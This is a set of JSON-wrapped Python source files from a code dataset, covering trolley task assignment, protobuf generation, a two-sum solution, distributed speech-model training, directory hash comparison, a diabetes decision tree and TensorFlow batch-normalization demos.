+{"seq_id":"388976345","text":"from external import *\nfrom TaskAssignment import *\nfrom display import *\n\nv = Visualization(\"Map.jpg\", 60)\nnum_t = 50\nt = np.concatenate((np.random.rand(num_t,1) * 1078, np.random.rand(num_t,1)*730), axis=1)\nt_list = []\n\nfor i in range(len(t)):\n t_list.append(Trolley(t[i, 0], t[i, 1]))\n\nassign = TaskAssignment(t_list, [])\ngroups = assign.grouping()\n\ngo_match = True\nwhile True:\n t_group = TrolleyGroup(0,0,t_list)\n if v.read_click_flag():\n go_match = False\n t_group.elimanate_trolleys_nearby(v.get_mouse_pos())\n t_list = t_group.get_trolleys()\n\n new_groups = []\n for g in groups:\n g.elimanate_trolleys_nearby(v.get_mouse_pos())\n if len(g.get_trolleys()) != 0:\n new_groups.append(TrolleyGroup(*g.get_position(), g.get_trolleys()))\n else:\n go_match = True\n groups = new_groups\n\n w_list = [Worker(*v.get_mouse_pos()), ]\n assign.update(worker=w_list)\n\n if go_match:\n match = assign.assign_workers_to_groups(groups)\n paths = []\n for i, w in enumerate(w_list):\n order = assign.calculate_picking_order(w, groups[match[i]])\n paths.append(order)\n\n v.update(worker=w_list, trolley=t_list, groups=groups, match=match, paths=paths)\n v.draw()\n k = cv2.waitKey(1)\n if k == ord('q'):\n break\n elif k == ord('g'):\n v.on_off_show(groups=False)\n elif k == ord('a'):\n t = np.concatenate((np.random.rand(3,1) * 1078, np.random.rand(3,1)*730), axis=1)\n for i in range(len(t)):\n t_list.append(Trolley(t[i, 0], t[i, 1]))\n assign.update(trolley=t_list)\n groups = assign.grouping()","sub_path":"one_worker_add_trolleys.py","file_name":"one_worker_add_trolleys.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"400775493","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os, sys\r\nimport string\r\nimport glob\r\n\r\n\r\nwork_dir = os.getcwd();\r\nscript_dir = os.path.dirname(os.path.realpath(__file__))\r\nos.chdir(script_dir)\r\nos.chdir(os.path.join('..'));\r\n\r\nproject_dir = os.getcwd();\r\nproto_dir = os.path.join(script_dir, 'proto_v2');\r\n\r\nproto_file = []\r\nfor item in glob.glob(os.path.join(proto_dir, '*.proto')):\r\n proto_file.append('\"' + item + '\"');\r\n\r\nos.chdir(work_dir);\r\nos.system('python \"{0}\"'.format(os.path.join(project_dir, 'loader-binding', 'cxx', 'gen_protocol.py')))\r\ncpp_out_dir = os.path.join(script_dir, 'cxx');\r\n\r\nproto_src_dir = '{0}/v2'.format(cpp_out_dir)\r\nif not os.path.exists(proto_src_dir):\r\n os.mkdir(proto_src_dir)\r\nparams = ['protoc', '-I', proto_dir, '-o', os.path.join(proto_dir, 'kind.pb'), '--cpp_out={0}'.format(proto_src_dir)]\r\nparams.extend(proto_file)\r\ncmd = ' '.join(params)\r\nprint(cmd)\r\nos.system(cmd)\r\n\r\n","sub_path":"sample/gen_protocol.py","file_name":"gen_protocol.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"390200850","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 16:17:38 2018\n\n@author: owen\n\"\"\"\n\n# Given an array of integers, find how many pairs in the array such that \n# their sum is less than or equal to a specific target number. \n\n#class Solution:\n# \"\"\"\n# @param nums: an array of integer\n# @param target: an integer\n# @return: an integer\n# \"\"\"\n# def twoSum5(self, nums, target):\n# # write your code here\n# # sort + two pointers, time O(n log n + n^2)\n# nums.sort()\n# n = len(nums)\n# res = 0\n# for right in range(n - 1, 0, -1):\n# left = right - 1 # from right to left, find the first left that makes left + right <= target\n# while left >=0 and nums[left] + nums[right] > target:\n# left -= 1\n# res += left + 1\n# \n# return res\n\nclass Solution:\n \"\"\"\n @param nums: an array of integer\n @param target: an integer\n @return: an integer\n \"\"\"\n def twoSum5(self, nums, target):\n # write your code here\n # sort + two pointers, time O(nlogn + n)\n nums.sort()\n n = len(nums)\n res = 0\n left, right = 0, n - 1\n while left < right:\n sums = nums[left] + nums[right]\n if sums > target:\n right -= 1\n else: # for each left, find the last right that makes left + right <= target\n res += right - left\n left += 1\n \n return res","sub_path":"Two Sum - Less than or equal to target.py","file_name":"Two Sum - Less than or equal to target.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"513729088","text":"\"\"\"\nCopyright 2021 Tsinghua University\nApache 2.0.\nAuthor: Zheng Huahuan (zhh20@mails.tsinghua.edu.cn)\n\nThis script uses DistributedDataParallel (DDP) to train model within framework of CAT.\nDiffered from `train_dist.py`, this one supports read configurations from json file\nand is more non-hard-coding style.\n\"\"\"\n\nimport utils\nimport os\nimport argparse\nimport numpy as np\nimport model as model_zoo\nimport dataset as DataSet\nfrom _specaug import SpecAug\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torch.utils.data import DataLoader\n\nimport ctc_crf_base\n\n\ndef main(args):\n if not torch.cuda.is_available():\n utils.highlight_msg(\"CPU only training is unsupported.\")\n return None\n\n os.makedirs(args.dir+'/ckpt', exist_ok=True)\n setattr(args, 'ckptpath', args.dir+'/ckpt')\n if os.listdir(args.ckptpath) != [] and not args.debug and args.resume is None:\n utils.highlight_msg(\n f\"ERROR:\\nCheckpoint path `{args.ckptpath}` is not empty!\\nRefuse to run the experiment, otherwise previous files would be overwritten.\")\n raise AssertionError\n\n ngpus_per_node = torch.cuda.device_count()\n args.world_size = ngpus_per_node * args.world_size\n print(f\"Global number of GPUs: {args.world_size}\")\n mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))\n\n\ndef main_worker(gpu, ngpus_per_node, args):\n args.gpu = gpu\n\n args.rank = args.rank * ngpus_per_node + gpu\n print(f\"Use GPU: local[{args.gpu}] | global[{args.rank}]\")\n\n dist.init_process_group(\n backend=args.dist_backend, init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n\n args.batch_size = args.batch_size // ngpus_per_node\n\n print(\"> Data prepare\")\n if args.h5py:\n data_format = \"hdf5\"\n utils.highlight_msg(\"H5py reading might cause error with Multi-GPUs.\")\n Dataset = DataSet.SpeechDataset\n else:\n data_format = \"pickle\"\n Dataset = DataSet.SpeechDatasetPickle\n\n tr_set = Dataset(\n f\"{args.data}/{data_format}/tr.{data_format}\")\n test_set = Dataset(\n f\"{args.data}/{data_format}/cv.{data_format}\")\n print(\"Data prepared.\")\n\n train_sampler = DistributedSampler(tr_set)\n test_sampler = DistributedSampler(test_set)\n test_sampler.set_epoch(1)\n\n trainloader = DataLoader(\n tr_set, batch_size=args.batch_size, shuffle=(train_sampler is None),\n num_workers=args.workers, pin_memory=True,\n sampler=train_sampler, collate_fn=DataSet.sortedPadCollate())\n\n testloader = DataLoader(\n test_set, batch_size=args.batch_size, shuffle=(test_sampler is None),\n num_workers=args.workers, pin_memory=True,\n sampler=test_sampler, collate_fn=DataSet.sortedPadCollate())\n\n logger = OrderedDict({\n 'log_train': ['epoch,loss,loss_real,net_lr,time'],\n 'log_eval': ['loss_real,time']\n })\n manager = utils.Manager(logger, build_model, args)\n\n # get GPU info\n gpu_info = utils.gather_all_gpu_info(args.gpu)\n\n if args.rank == 0:\n print(\"> Model built.\")\n print(\"Model size:{:.2f}M\".format(\n utils.count_parameters(manager.model)/1e6))\n\n utils.gen_readme(args.dir+'/readme.md',\n model=manager.model, gpu_info=gpu_info)\n\n # init ctc-crf, args.iscrf is set in build_model\n if args.iscrf:\n gpus = torch.IntTensor([args.gpu])\n ctc_crf_base.init_env(f\"{args.data}/den_meta/den_lm.fst\", gpus)\n\n # training\n manager.run(train_sampler, trainloader, testloader, args)\n\n if args.iscrf:\n ctc_crf_base.release_env(gpus)\n\n\nclass CAT_Model(nn.Module):\n def __init__(self, NET=None, fn_loss='crf', lamb: float = 0.1, net_kwargs: dict = None, sepcaug: nn.Module = None):\n super().__init__()\n if NET is None:\n return None\n\n self.infer = NET(**net_kwargs)\n self.specaug = sepcaug\n\n if fn_loss == \"ctc\":\n self.loss_fn = utils.CTCLoss()\n elif fn_loss == \"crf\":\n self.loss_fn = utils.CRFLoss(lamb=lamb)\n else:\n raise ValueError(f\"Unknown loss function: {fn_loss}\")\n\n def forward(self, logits, labels, input_lengths, label_lengths):\n labels = labels.cpu()\n input_lengths = input_lengths.cpu()\n label_lengths = label_lengths.cpu()\n\n netout, lens_o = self.infer(logits, input_lengths)\n netout = torch.log_softmax(netout, dim=-1)\n\n loss = self.loss_fn(netout, labels, lens_o.to(\n torch.int32).cpu(), label_lengths)\n\n return loss\n\n\ndef build_model(args, configuration, train=True) -> nn.Module:\n\n netconfigs = configuration['net']\n net_kwargs = netconfigs['kwargs']\n net = getattr(model_zoo, netconfigs['type'])\n\n if not train:\n infer_model = net(**net_kwargs)\n return infer_model\n\n if 'lossfn' not in netconfigs:\n lossfn = 'crf'\n utils.highlight_msg(\n \"Warning: not specified \\'lossfn\\' in configuration.\\nDefaultly set to \\'crf\\'\")\n else:\n lossfn = netconfigs['lossfn']\n\n if 'lamb' not in netconfigs:\n lamb = 0.01\n if lossfn == 'crf':\n utils.highlight_msg(\n \"Warning: not specified \\'lamb\\' in configuration.\\nDefaultly set to 0.01\")\n else:\n lamb = netconfigs['lamb']\n\n if 'specaug' not in netconfigs:\n specaug = None\n if args.rank == 0:\n utils.highlight_msg(\"Disable SpecAug.\")\n else:\n specaug = SpecAug(**netconfigs['specaug'])\n\n setattr(args, 'iscrf', lossfn == 'crf')\n model = CAT_Model(net, lossfn, lamb, net_kwargs, specaug)\n\n torch.cuda.set_device(args.gpu)\n model.cuda(args.gpu)\n model = torch.nn.parallel.DistributedDataParallel(\n model, device_ids=[args.gpu])\n return model\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"recognition argument\")\n\n parser.add_argument('--batch_size', default=256, type=int, metavar='N',\n help='mini-batch size (default: 256), this is the total '\n 'batch size of all GPUs on the current node when '\n 'using Distributed Data Parallel')\n\n parser.add_argument(\"--seed\", type=int, default=0,\n help=\"Manual seed.\")\n\n parser.add_argument(\"--resume\", type=str, default=None,\n help=\"Path to location of checkpoint.\")\n\n parser.add_argument(\"--debug\", action=\"store_true\",\n help=\"Configure to debug settings, would overwrite most of the options.\")\n parser.add_argument(\"--h5py\", action=\"store_true\",\n help=\"Load data with H5py, defaultly use pickle (recommended).\")\n\n parser.add_argument(\"--config\", type=str, default=None, metavar='PATH',\n help=\"Path to configuration file of training procedure.\")\n\n parser.add_argument(\"--data\", type=str, default=None,\n help=\"Location of training/testing data.\")\n parser.add_argument(\"--dir\", type=str, default=None, metavar='PATH',\n help=\"Directory to save the log and model files.\")\n\n parser.add_argument('-p', '--print-freq', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\n\n parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\n parser.add_argument('--rank', default=-1, type=int,\n help='node rank for distributed training')\n parser.add_argument('--dist-url', default='tcp://127.0.0.1:13943', type=str,\n help='url used to set up distributed training')\n parser.add_argument('--dist-backend', default='nccl', type=str,\n help='distributed backend')\n parser.add_argument('--world-size', default=-1, type=int,\n help='number of nodes for distributed training')\n parser.add_argument('--gpu', default=None, type=int,\n help='GPU id to use.')\n\n args = parser.parse_args()\n\n SEED = args.seed\n torch.manual_seed(SEED)\n torch.cuda.manual_seed_all(SEED)\n np.random.seed(SEED)\n torch.backends.cudnn.deterministic = True\n\n if args.debug:\n utils.highlight_msg(\"Debugging.\")\n\n main(args)\n","sub_path":"scripts/ctc-crf/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"267652629","text":"#! /usr/bin/python\r\n# encoding=UTF-8\r\n# version 3.x\r\n\r\n\"\"\"备份或根据备份信息比较目录的变化\"\"\"\r\n\r\nimport os, datetime, time, hashlib, re\r\nimport optparse\r\nfrom string import Template\r\n\r\n\r\ndef file_md5(file_path):\r\n md5 = None\r\n if os.path.isfile(file_path):\r\n f = open(file_path, 'rb')\r\n md5_obj = hashlib.md5()\r\n md5_obj.update(f.read())\r\n hash_code = md5_obj.hexdigest()\r\n f.close()\r\n md5 = str(hash_code).lower()\r\n return md5\r\n\r\n\r\ndef time_str(t):\r\n tt = datetime.datetime.fromtimestamp(t)\r\n return tt.strftime('%Y%m%d%H%M%S')\r\n\r\n\r\ndef file_info(f, path):\r\n \"\"\"获取文件信息\"\"\"\r\n path_len = len(path)\r\n info = Template(\"\"\"{'name':'${name}','dir':${dir},'md5':'${md5}'}\"\"\")\r\n name = re.sub('\\\\\\\\', '/', f[path_len:])\r\n # ctime = time_str(os.path.getctime(f))\r\n # mtime = time_str(os.path.getmtime(f))\r\n # atime = time(os.path.getatime(f))\r\n isdir = os.path.isdir(f)\r\n md5 = file_md5(f)\r\n return re.sub('\\s+', '', info.substitute(name=name, dir=isdir, md5=md5))\r\n\r\n\r\ndef dir_info(path):\r\n \"\"\"获取指定目录下的各个文件的信息\"\"\"\r\n da = []\r\n for root, dirs, files in os.walk(path):\r\n for dir in dirs:\r\n d = os.path.join(root, dir)\r\n da.append(file_info(d, path))\r\n for f in files:\r\n f = os.path.join(root, f)\r\n da.append(file_info(f, path))\r\n return da\r\n\r\n\r\ndef load_file_content(file):\r\n \"\"\"将文件内容已字符串的形式返回\"\"\"\r\n with open(file, 'r') as ff:\r\n return ff.read()\r\n\r\n\r\ndef usage():\r\n \"\"\"命令行帮助\"\"\"\r\n print(\"\"\"\r\n hash3compare.py \r\n usage:\r\n hash3compare.py -b -d dir 备份dir目录的信息\r\n hash3compare.py -c -f hash.txt -p dir 根据hash.txt的备份信息比较dir目录的变化\r\n hash3compare.py -c -s dir1 -p dir2 根据dir1为基础比较dir目录的变化\r\n params:\r\n -b back dir 备份目录信息\r\n -d dir 目录信息\r\n -c compare 对比变化\r\n -f hash file 从文件对比中对比\r\n -s resource path 比较的目录\r\n -p compare path 比较的目录 \r\n \"\"\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = optparse.OptionParser()\r\n parser.add_option('-b', '--back', action=\"store_true\", default=False, dest=\"back\", help=\"back path info\")\r\n parser.add_option('-c', '--compare', action=\"store_true\", default=False, dest=\"compare\", help=\"compare path modify\")\r\n parser.add_option('-f', '--file', action=\"store\", dest=\"file\", help=\"compare modify with hash.txt\")\r\n parser.add_option('-s', '--source', action=\"store\", dest=\"source\", help=\"compare modify with this path\")\r\n parser.add_option('-p', '--path', action=\"store\", dest=\"path\", help='back or compare path')\r\n\r\n (options, args) = parser.parse_args()\r\n\r\n # print(options)\r\n if options.back and options.compare:\r\n usage()\r\n exit()\r\n elif options.back:\r\n if options.path and os.path.exists(os.path.abspath(options.path)):\r\n path = os.path.abspath(options.path)\r\n print(\"bak -> \" + path)\r\n dir_result = dir_info(path)\r\n cur_time = time.strftime('%Y%m%d%H%M%S', time.localtime())\r\n with open(\"hash_\" + cur_time + \".txt\", 'w') as ff:\r\n ff.write(str(dir_result))\r\n else:\r\n print(\"file not exists:\" + options.path)\r\n\r\n elif options.compare:\r\n if options.file and options.source:\r\n usage()\r\n else:\r\n base_path = os.path.abspath(options.file or options.source)\r\n path = os.path.abspath(options.path)\r\n print(\"\"\"compare modify:\\n\\tleft :%s \\n\\tright: %s\"\"\" % (base_path, path))\r\n dir_result = dir_info(path)\r\n if options.file:\r\n bak_result = eval(load_file_content(options.file))\r\n else:\r\n bak_result = dir_info(base_path)\r\n\r\n af, afmd5, bf, bfmd5 = set(), set(), set(), set()\r\n for a in dir_result:\r\n t = eval(a)\r\n af.add(t['name'])\r\n afmd5.add(t['name'] + \":\" + t['md5'])\r\n for b in bak_result:\r\n u = eval(b)\r\n bf.add(u['name'])\r\n bfmd5.add(u['name'] + \":\" + u['md5'])\r\n\r\n add_file_list = af.difference(bf)\r\n if len(add_file_list):\r\n print(\"===add file to right:\")\r\n for f in add_file_list:\r\n print(\"\\t %s\" % f)\r\n\r\n delete_file_list = bf.difference(af)\r\n if len(delete_file_list):\r\n print(\"===delete file form left:\")\r\n for f in delete_file_list:\r\n print(\"\\t %s\" % f)\r\n\r\n modify_file_list = afmd5.difference(bfmd5)\r\n if len(modify_file_list):\r\n print(\"===modify file:\")\r\n for f in modify_file_list:\r\n fn = f.split(':')[0]\r\n if fn not in add_file_list and fn not in delete_file_list:\r\n print(\"\\t\" + f)\r\n\r\n else:\r\n usage()\r\n","sub_path":"src/hash3compare.py","file_name":"hash3compare.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"195506064","text":"from sklearn import tree\n#from sklearn.metrics import accuracy_score\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndata = pd.read_csv('indians-diabetes.data', header = None, delimiter=' *, *', engine='python')\ndata.columns = ['num_pregent', 'glucose', 'bp', 'triceps', 'serum', 'bmi', 'dpf', 'age', 'class']\n\n#extract features and targets from the data\nfeatures = data.values[:,:8]\ntarget = data.values[:,8]\n\n#Split arrays or matrices into random train and test subsets\nfeatures_train, features_test, target_train, target_test = train_test_split(features, target, test_size = 0.33, random_state = 10)\n\n#Create a Tree Classifier\nclf = tree.DecisionTreeClassifier(min_samples_split=40)\n\n#Fit Tree classifier according to features_train, target_train\nclf.fit(features_train, target_train)\n\n#Perform classification on an array of test vectors \ntarget_pred = clf.predict([1,89,66,23,94,28.1,0.167,21])\n\nif target_pred == [1]:\n print(\"Diabetes positive\")\nelse:\n print(\"Diabetes negative\")\n\n#Returns the mean accuracy on the given test data and labels.\nprint (clf.score(features_test, target_test)*100)\n\n#print (accuracy_score(target_test, pred))","sub_path":"Diabetes_Predction/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"88529778","text":"'''\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport tensorflow.compat.v1 as tf \ntf.compat.v1.disable_eager_execution()\n\nACTIVATION = tf.nn.relu\t\t#每一层都使用relu\nN_LAYERS = 7\t\t\t\t#一共7层隐藏层\nN_HIDDEN_UNITS = 30\t\t\t#每个隐藏层有30个神经元\n\n#重复观看\ndef fix_seed(seed=1):\n\t#reporducible\n\tnp.random.seed(seed)\n\ttf.set_random_seed(seed)\n\n\n#打印图片\ndef plot_his(inputs, inputs_norm):\n\t#plot histogram for the inputs of every layer\n\tfor j, all_inputs in enumerate([inputs, inputs_norm]):\n\t\tfor i, input in enumerate(all_inputs):\n\t\t\tplt.subplot(2, len(all_inputs), j*len(all_inputs)+(i+1))\n\t\t\tplt.cla()\n\t\t\tif i == 0:\n\t\t\t\tthe_range = (-7,10)\n\t\t\telse:\n\t\t\t\tthe_range = (-1,1)\n\t\t\tplt.hist(input.ravel(), bins=15, range=the_range, color='#FF5733')\n\t\t\tplt.yticks(())\n\t\t\tif j == 1:\n\t\t\t\tplt.xticks(the_range)\n\t\t\telse:\n\t\t\t\tplt.xticks(())\n\t\t\tax = plt.gca()\n\t\t\tax.spines['right'].set_color('none')\n\t\t\tax.spines['top'].set_color('none')\n\t\tplt.title(\"%s normalizing\" % (\"Without\" if j == 0 else \"With\"))\n\tplt.draw()\n\tplt.pause(0.01)\n\n\n#建立神经网络\ndef built_net(xs, ys, norm):\n\tdef add_layer(inputs, in_size, out_size, activation_function=None, norm=False):\n\t\tWeights = tf.Variable(tf.random_normal([in_size, out_size], mean=0., stddev=1.))\n\t\tbiases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n\t\tWx_plus_b = tf.matmul(inputs, Weights) + biases\n\t\t\n\t\tif norm:\n\t\t\tfc_mean, fc_var = tf.nn.moments(Wx_plus_b, axes=[0])\n\t\t\tscale = tf.Variable(tf.ones([out_size]))\n\t\t\tshift = tf.Variable(tf.zeros([out_size]))\n\t\t\tepsilon = 0.001\n\n\t\t\tema = tf.train.ExponentialMovingAverage(decay=0.5)\n\t\t\tdef mean_var_with_update():\n\t\t\t\tema_apply_op = ema.apply([fc_mean, fc_var])\n\t\t\t\twith tf.control_dependencies([ema_apply_op]):\n\t\t\t\t\treturn tf.identity(fc_mean), tf.identity(fc_var)\n\t\t\tmean, var = mean_var_with_update()\n\n\n\t\t\tWx_plus_b = tf.nn.batch_normalization(Wx_plus_b, mean, var, shift, scale, epsilon)\n\n\n\n\t\tif activation_function is None:\n\t\t\toutputs = Wx_plus_b\n\t\telse:\n\t\t\toutputs = activation_function(Wx_plus_b)\n\n\t\treturn outputs\n\n\tfix_seed(1)\n\n\tif norm:\n\t\t# BN for the first input\n\t\tfc_mean, fc_var = tf.nn.moments(xs, axes=[0],)\n\t\tscale = tf.Variable(tf.ones([1]))\n\t\tshift = tf.Variable(tf.zeros([1]))\n\t\tepsilon = 0.001\n\t\t# apply moving average for mean and var when train on batch\n\t\tema = tf.train.ExponentialMovingAverage(decay=0.5)\n\t\tdef mean_var_with_update():\n\t\t\tema_apply_op = ema.apply([fc_mean, fc_var])\n\t\t\twith tf.control_dependencies([ema_apply_op]):\n\t\t\t\treturn tf.identity(fc_mean), tf.identity(fc_var)\n\t\tmean, var = mean_var_with_update()\n\t\txs = tf.nn.batch_normalization(xs, mean, var, shift, scale, epsilon)\n\n\n\t#recorde inputs for every layer \n\tlayers_inputs = [xs]\n\n\t#build hidden layers\n\tfor l_n in range(N_LAYERS):\n\t\tlayer_input = layers_inputs[l_n]\n\t\tin_size = layers_inputs[l_n].get_shape()[1].value\n\n\t\toutput = add_layer(layer_input, in_size, N_HIDDEN_UNITS, ACTIVATION, norm,)\n\t\tlayers_inputs.append(output)\n\n\n\tprediction = add_layer(layers_inputs[-1], 30, 1, activation_function=None)\n\n\tcost = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction), reduction_indices=[1]))\n\ttrain_op = tf.train.GradientDescentOptimizer(0.001).minimize(cost)\n\treturn [train_op, cost, layers_inputs]\n\n\n#make up data\nfix_seed(1)\nx_data = np.linspace(-7, 10, 2500)[:, np.newaxis]\nnp.random.shuffle(x_data)\nnoise = np.random.normal(0, 8, x_data.shape)\ny_data = np.square(x_data) - 5 + noise\n\n\n#plot input data\nplt.scatter(x_data, y_data)\nplt.show()\n\nxs = tf.placeholder(tf.float32, [None, 1])\t\t#[num_samples, num_features]\nys = tf.placeholder(tf.float32, [None, 1])\n\ntrain_op, cost, layers_inputs = built_net(xs, ys, norm=False)\t\t\t\t\t#without BN\ntrain_op_norm, cost_norm, layers_inputs_norm = built_net(xs, ys, norm=True)\t\t#with BN\n\nsess = tf.Session()\ninit = tf.global_variables_initializer\nsess.run(init)\n\n\n#record cost\ncost_his = []\ncost_his_norm = []\nrecord_step = 5\n\nplt.ion()\nplt.figure(figsize=(7, 3))\nfor i in range(250):\n\tif i % 50 == 0:\n\t\tall_inputs, all_inputs_norm = sess.run([layers_inputs, layers_inputs_norm], feed_dict={xs: x_data, ys: y_data})\n\t\tplot_his(all_inputs, all_inputs_norm)\n\n\t# train on batch\n\tsess.run([train_op, train_op_norm], feed_dict={xs: x_data[i*10:i*10+10], ys: y_data[i*10:i*10+10]})\n\n\tif i % record_step == 0:\n\t\t#record cost\n\t\tcost_his.append(sess.run(cost, feed_dict={xs:x_data, ys:y_data}))\n\t\tcost_his_norm.append(sess.run(cost_norm, feed_dict={xs:x_data, ys:y_data}))\n\n\n\nplt.ioff()\nplt.figure()\nplt.plot(np.arange(len(cost_his))*record_step, np.array(cost_his), label='no BN') # no norm\nplt.plot(np.arange(len(cost_his))*record_step, np.array(cost_his_norm), label='BN') # norm\nplt.legend()\nplt.show()\n'''\n\n\nimport tensorflow.compat.v1 as tf \ntf.compat.v1.disable_eager_execution()\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntf.set_random_seed(1)\nnp.random.seed(1)\n\n# Hyper parameters\nN_SAMPLES = 2000\nBATCH_SIZE = 64\nEPOCH = 12\nLR = 0.03\nN_HIDDEN = 8\nACTIVATION = tf.nn.tanh\nB_INIT = tf.constant_initializer(-0.2) # use a bad bias initialization\n\n# training data\nx = np.linspace(-7, 10, N_SAMPLES)[:, np.newaxis]\nnp.random.shuffle(x)\nnoise = np.random.normal(0, 2, x.shape)\ny = np.square(x) - 5 + noise\ntrain_data = np.hstack((x, y))\n\n# test data\ntest_x = np.linspace(-7, 10, 200)[:, np.newaxis]\nnoise = np.random.normal(0, 2, test_x.shape)\ntest_y = np.square(test_x) - 5 + noise\n\n# plot input data\nplt.scatter(x, y, c='#FF9359', s=50, alpha=0.5, label='train')\nplt.legend(loc='upper left')\n\n# tensorflow placeholder\ntf_x = tf.placeholder(tf.float32, [None, 1])\ntf_y = tf.placeholder(tf.float32, [None, 1])\ntf_is_train = tf.placeholder(tf.bool, None) # flag for using BN on training or testing\n\n\nclass NN(object):\n def __init__(self, batch_normalization=False):\n self.is_bn = batch_normalization\n\n self.w_init = tf.random_normal_initializer(0., .1) # weights initialization\n self.pre_activation = [tf_x]\n if self.is_bn:\n self.layer_input = [tf.layers.batch_normalization(tf_x, training=tf_is_train)] # for input data\n else:\n self.layer_input = [tf_x]\n for i in range(N_HIDDEN): # adding hidden layers\n self.layer_input.append(self.add_layer(self.layer_input[-1], 10, ac=ACTIVATION))\n self.out = tf.layers.dense(self.layer_input[-1], 1, kernel_initializer=self.w_init, bias_initializer=B_INIT)\n self.loss = tf.losses.mean_squared_error(tf_y, self.out)\n\n # !! IMPORTANT !! the moving_mean and moving_variance need to be updated,\n # pass the update_ops with control_dependencies to the train_op\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.train = tf.train.AdamOptimizer(LR).minimize(self.loss)\n\n def add_layer(self, x, out_size, ac=None):\n x = tf.layers.dense(x, out_size, kernel_initializer=self.w_init, bias_initializer=B_INIT)\n self.pre_activation.append(x)\n # the momentum plays important rule. the default 0.99 is too high in this case!\n if self.is_bn: x = tf.layers.batch_normalization(x, momentum=0.4, training=tf_is_train) # when have BN\n out = x if ac is None else ac(x)\n return out\n\nnets = [NN(batch_normalization=False), NN(batch_normalization=True)] # two nets, with and without BN\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n# plot layer input distribution\nf, axs = plt.subplots(4, N_HIDDEN+1, figsize=(10, 5))\nplt.ion() # something about plotting\n\ndef plot_histogram(l_in, l_in_bn, pre_ac, pre_ac_bn):\n for i, (ax_pa, ax_pa_bn, ax, ax_bn) in enumerate(zip(axs[0, :], axs[1, :], axs[2, :], axs[3, :])):\n [a.clear() for a in [ax_pa, ax_pa_bn, ax, ax_bn]]\n if i == 0: p_range = (-7, 10); the_range = (-7, 10)\n else: p_range = (-4, 4); the_range = (-1, 1)\n ax_pa.set_title('L' + str(i))\n ax_pa.hist(pre_ac[i].ravel(), bins=10, range=p_range, color='#FF9359', alpha=0.5)\n ax_pa_bn.hist(pre_ac_bn[i].ravel(), bins=10, range=p_range, color='#74BCFF', alpha=0.5)\n ax.hist(l_in[i].ravel(), bins=10, range=the_range, color='#FF9359')\n ax_bn.hist(l_in_bn[i].ravel(), bins=10, range=the_range, color='#74BCFF')\n for a in [ax_pa, ax, ax_pa_bn, ax_bn]:\n a.set_yticks(()); a.set_xticks(())\n ax_pa_bn.set_xticks(p_range); ax_bn.set_xticks(the_range); axs[2, 0].set_ylabel('Act'); axs[3, 0].set_ylabel('BN Act')\n plt.pause(0.01)\n\nlosses = [[], []] # record test loss\nfor epoch in range(EPOCH):\n print('Epoch: ', epoch)\n np.random.shuffle(train_data)\n step = 0\n in_epoch = True\n while in_epoch:\n b_s, b_f = (step*BATCH_SIZE) % len(train_data), ((step+1)*BATCH_SIZE) % len(train_data) # batch index\n step += 1\n if b_f < b_s:\n b_f = len(train_data)\n in_epoch = False\n b_x, b_y = train_data[b_s: b_f, 0:1], train_data[b_s: b_f, 1:2] # batch training data\n sess.run([nets[0].train, nets[1].train], {tf_x: b_x, tf_y: b_y, tf_is_train: True}) # train\n\n if step == 1:\n l0, l1, l_in, l_in_bn, pa, pa_bn = sess.run(\n [nets[0].loss, nets[1].loss, nets[0].layer_input, nets[1].layer_input,\n nets[0].pre_activation, nets[1].pre_activation],\n {tf_x: test_x, tf_y: test_y, tf_is_train: False})\n [loss.append(l) for loss, l in zip(losses, [l0, l1])] # recode test loss\n plot_histogram(l_in, l_in_bn, pa, pa_bn) # plot histogram\n\nplt.ioff()\n\n# plot test loss\nplt.figure(2)\nplt.plot(losses[0], c='#FF9359', lw=3, label='Original')\nplt.plot(losses[1], c='#74BCFF', lw=3, label='Batch Normalization')\nplt.ylabel('test loss'); plt.ylim((0, 2000)); plt.legend(loc='best')\n\n# plot prediction line\npred, pred_bn = sess.run([nets[0].out, nets[1].out], {tf_x: test_x, tf_is_train: False})\nplt.figure(3)\nplt.plot(test_x, pred, c='#FF9359', lw=4, label='Original')\nplt.plot(test_x, pred_bn, c='#74BCFF', lw=4, label='Batch Normalization')\nplt.scatter(x[:200], y[:200], c='r', s=50, alpha=0.2, label='train')\nplt.legend(loc='best'); plt.show()","sub_path":"TensorFlow/batch_n.py","file_name":"batch_n.py","file_ext":"py","file_size_in_byte":10134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
